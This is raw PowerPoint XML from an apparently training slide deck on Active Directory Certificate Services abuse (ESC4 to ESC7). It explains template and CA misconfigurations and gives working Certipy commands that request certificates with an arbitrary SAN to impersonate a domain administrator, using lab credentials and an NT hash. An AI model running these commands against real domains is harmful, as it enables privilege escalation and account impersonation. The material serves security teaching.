              <a:rPr lang="es-ES" altLang="es-ES" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" altLang="es-ES" sz="2000" dirty="0" err="1"/>
              <a:t>old</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" altLang="es-ES" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" altLang="es-ES" sz="2000" dirty="0" err="1"/>
              <a:t>configuration</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" altLang="es-ES" sz="2000" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" altLang="es-ES" sz="2000" dirty="0" err="1"/>
              <a:t>which</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" altLang="es-ES" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" altLang="es-ES" sz="2000" dirty="0" err="1"/>
              <a:t>is</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" altLang="es-ES" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" altLang="es-ES" sz="2000" dirty="0" err="1"/>
              <a:t>useful</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" altLang="es-ES" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" altLang="es-ES" sz="2000" dirty="0" err="1"/>
              <a:t>for</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" altLang="es-ES" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" altLang="es-ES" sz="2000" dirty="0" err="1"/>
              <a:t>restoring</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" altLang="es-ES" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" altLang="es-ES" sz="2000" dirty="0" err="1"/>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" altLang="es-ES" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" altLang="es-ES" sz="2000" dirty="0" err="1"/>
              <a:t>configuration</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" altLang="es-ES" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" altLang="es-ES" sz="2000" dirty="0" err="1"/>
              <a:t>afterwards</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" altLang="es-ES" sz="2000" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" altLang="es-ES" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="es-ES" sz="2000" dirty="0"/>
              <a:t>The certificate template is now vulnerable to the ESC1 technique</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="es-ES" sz="2000" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="es-ES" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="es-ES" sz="2000" dirty="0"/>
              <a:t>Therefore, we can now request a certificate based on the ESC4 template and specify an arbitrary SAN with the -alt parameter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="es-ES" sz="2000" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="es-ES" altLang="es-ES" sz="1600" dirty="0" err="1"/>
              <a:t>certipy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" altLang="es-ES" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" altLang="es-ES" sz="1600" dirty="0" err="1"/>
              <a:t>req</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" altLang="es-ES" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" altLang="es-ES" sz="1600" dirty="0" smtClean="0"/>
              <a:t>‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>EvilCorp.local</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0" smtClean="0"/>
              <a:t>/TheHorseman:EvilCorp3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0"/>
              <a:t>.@EVILDC1.EvilCorp.local </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" altLang="es-ES" sz="1600" dirty="0" smtClean="0"/>
              <a:t>' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" altLang="es-ES" sz="1600" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" altLang="es-ES" sz="1600" dirty="0" err="1"/>
              <a:t>ca</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" altLang="es-ES" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" altLang="es-ES" sz="1600" dirty="0" smtClean="0"/>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0"/>
              <a:t>EvilCorp-EVILDC1-CA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" altLang="es-ES" sz="1600" dirty="0" smtClean="0"/>
              <a:t>' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" altLang="es-ES" sz="1600" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" altLang="es-ES" sz="1600" dirty="0" err="1"/>
              <a:t>template</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" altLang="es-ES" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" altLang="es-ES" sz="1600" dirty="0" smtClean="0"/>
              <a:t>‘Vulnerable ESC4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" altLang="es-ES" sz="1600" dirty="0"/>
              <a:t>' -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" altLang="es-ES" sz="1600" dirty="0" err="1"/>
              <a:t>alt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" altLang="es-ES" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" altLang="es-ES" sz="1600" dirty="0" smtClean="0"/>
              <a:t>‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" altLang="es-ES" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>Administrator@EvilCorp.local</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" altLang="es-ES" sz="1600" dirty="0" smtClean="0"/>
              <a:t>‘</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" altLang="es-ES" sz="2000" dirty="0"/>
              <a:t>To </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" altLang="es-ES" sz="2000" dirty="0" err="1"/>
              <a:t>restore</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" altLang="es-ES" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" altLang="es-ES" sz="2000" dirty="0" err="1"/>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" altLang="es-ES" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" altLang="es-ES" sz="2000" dirty="0" err="1"/>
              <a:t>old</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" altLang="es-ES" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" altLang="es-ES" sz="2000" dirty="0" err="1"/>
              <a:t>configuration</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" altLang="es-ES" sz="2000" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" altLang="es-ES" sz="2000" dirty="0" err="1"/>
              <a:t>you</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" altLang="es-ES" sz="2000" dirty="0"/>
              <a:t> can </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" altLang="es-ES" sz="2000" dirty="0" err="1"/>
              <a:t>specify</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" altLang="es-ES" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" altLang="es-ES" sz="2000" dirty="0" err="1"/>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" altLang="es-ES" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" altLang="es-ES" sz="2000" dirty="0" err="1"/>
              <a:t>path</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" altLang="es-ES" sz="2000" dirty="0"/>
              <a:t> to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" altLang="es-ES" sz="2000" dirty="0" err="1"/>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" altLang="es-ES" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" altLang="es-ES" sz="2000" dirty="0" err="1"/>
              <a:t>saved</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" altLang="es-ES" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" altLang="es-ES" sz="2000" dirty="0" err="1"/>
              <a:t>configuration</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" altLang="es-ES" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" altLang="es-ES" sz="2000" dirty="0" err="1"/>
              <a:t>with</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" altLang="es-ES" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" altLang="es-ES" sz="2000" dirty="0" err="1"/>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" altLang="es-ES" sz="2000" dirty="0"/>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" altLang="es-ES" sz="2000" dirty="0" err="1"/>
              <a:t>configuration</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" altLang="es-ES" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" altLang="es-ES" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>parameter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" altLang="es-ES" sz="2000" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="es-ES" altLang="es-ES" sz="1600" dirty="0" err="1"/>
              <a:t>certipy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" altLang="es-ES" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" altLang="es-ES" sz="1600" dirty="0" err="1"/>
              <a:t>template</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" altLang="es-ES" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" altLang="es-ES" sz="1600" dirty="0" smtClean="0"/>
              <a:t>‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>EvilCorp.local</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0" smtClean="0"/>
              <a:t>/TheHorseman:EvilCorp3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0"/>
              <a:t>.@EVILDC1.EvilCorp.local </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" altLang="es-ES" sz="1600" dirty="0" smtClean="0"/>
              <a:t>' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" altLang="es-ES" sz="1600" dirty="0"/>
              <a:t>-hashes :fc525c9683e8fe067095ba2ddc971889 -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" altLang="es-ES" sz="1600" dirty="0" err="1"/>
              <a:t>template</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" altLang="es-ES" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" altLang="es-ES" sz="1600" dirty="0" smtClean="0"/>
              <a:t>‘Vulnerable ESC4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" altLang="es-ES" sz="1600" dirty="0"/>
              <a:t>' -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" altLang="es-ES" sz="1600" dirty="0" err="1"/>
              <a:t>configuration</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" altLang="es-ES" sz="1600" dirty="0"/>
              <a:t> ESC4.json</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="274320" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="es-ES" altLang="es-ES" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="870427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b="1" dirty="0" smtClean="0"/>
              <a:t>ESC5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="es-ES" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="es-ES" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Vulnerable PKI </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>Object</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2400" dirty="0" smtClean="0"/>
              <a:t> Access Control</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Marcador de contenido 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="621804" y="1905000"/>
            <a:ext cx="10153128" cy="4267200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Several objects outside of certificate templates and the certificate authority itself can have a security impact on the entire AD CS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>system:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The CA server’s AD computer object </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>The</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> CA </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>server’s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> RPC/DCOM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" smtClean="0"/>
              <a:t>server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Any descendant AD object or container in the container CN=Public Key Services, CN=Services, CN=Configuration, DC=demo, DC=local (e.g., the Certificate Templates container, Certification Authorities container, the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>NTAuthCertificates</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> object, the Enrollment Services Container, etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>…)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If a low-privileged attacker can gain control over any of these, the attack can likely compromise the PKI system. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3381774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93812" y="260648"/>
            <a:ext cx="9402274" cy="1400530"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="es-ES" b="1" dirty="0" smtClean="0"/>
              <a:t>ESC6</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="es-ES" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="es-ES" sz="2400" dirty="0" smtClean="0"/>
              <a:t>CA has EDIT_ATTRIBUTESUBJECTALTNAME2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>flag</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2400" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2400" dirty="0"/>
              <a:t>set</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Marcador de contenido 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="333772" y="1853248"/>
            <a:ext cx="9144000" cy="4267200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>If EDITF_ATTRIBUTESUBJECTALTNAME2 flag is enabled on an enterprise CA, alternative names are allowed for any certificate templates, regardless of templates' restrictions </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>itself.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Microsoft strongly not to enable this flag on an Enterprise </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>CA.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>This misconfiguration can be abused by adversary for issuing the certificate with an alternative name that would allow them to impersonate another user (like in case of ESC1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>).</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="1800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Imagen 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1629916" y="4338274"/>
            <a:ext cx="8039187" cy="1974244"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="CuadroTexto 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3637580" y="6453336"/>
            <a:ext cx="4023858" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>EDITF_ATTRIBUTESUBJECTALTNAME2</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="945815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b="1" dirty="0" smtClean="0"/>
              <a:t>ESC6</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" smtClean="0"/>
              <a:t> - Abuse</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Marcador de contenido 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="405781" y="2780928"/>
            <a:ext cx="11377264" cy="5157192"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>Same </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>as ESC1, except that you can choose any certificate template that permits client </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>authentication:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>certipy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>req</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0" smtClean="0"/>
              <a:t> ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>EvilCorp.local</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0" smtClean="0"/>
              <a:t>/TheHorseman:EvilCorp3.@EVILDC1.EvilCorp.local' -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>ca</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0" smtClean="0"/>
              <a:t> 'EvilCorp-EVILDC1-CA' -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>template</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0" smtClean="0"/>
              <a:t> ‘Vulnerable ESC1' -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>alt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0" smtClean="0"/>
              <a:t> ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>Administrator@EvilCorp.local</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0" smtClean="0"/>
              <a:t>'</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4221837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pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="es-ES" b="1" dirty="0" smtClean="0"/>
              <a:t>ESC7</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="es-ES" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="es-ES" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Vulnerable </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>Certificate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2400" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="es-ES" sz="2400" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="es-ES" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>Authority</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2400" dirty="0" smtClean="0"/>
              <a:t> Access Control</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Marcador de contenido 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="189756" y="2060848"/>
            <a:ext cx="7848872" cy="4536504"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Outside of certificate templates, a certificate authority itself has a set of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>permissions </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>that </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>secure various </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>CA actions. </a:t>
            </a:r>
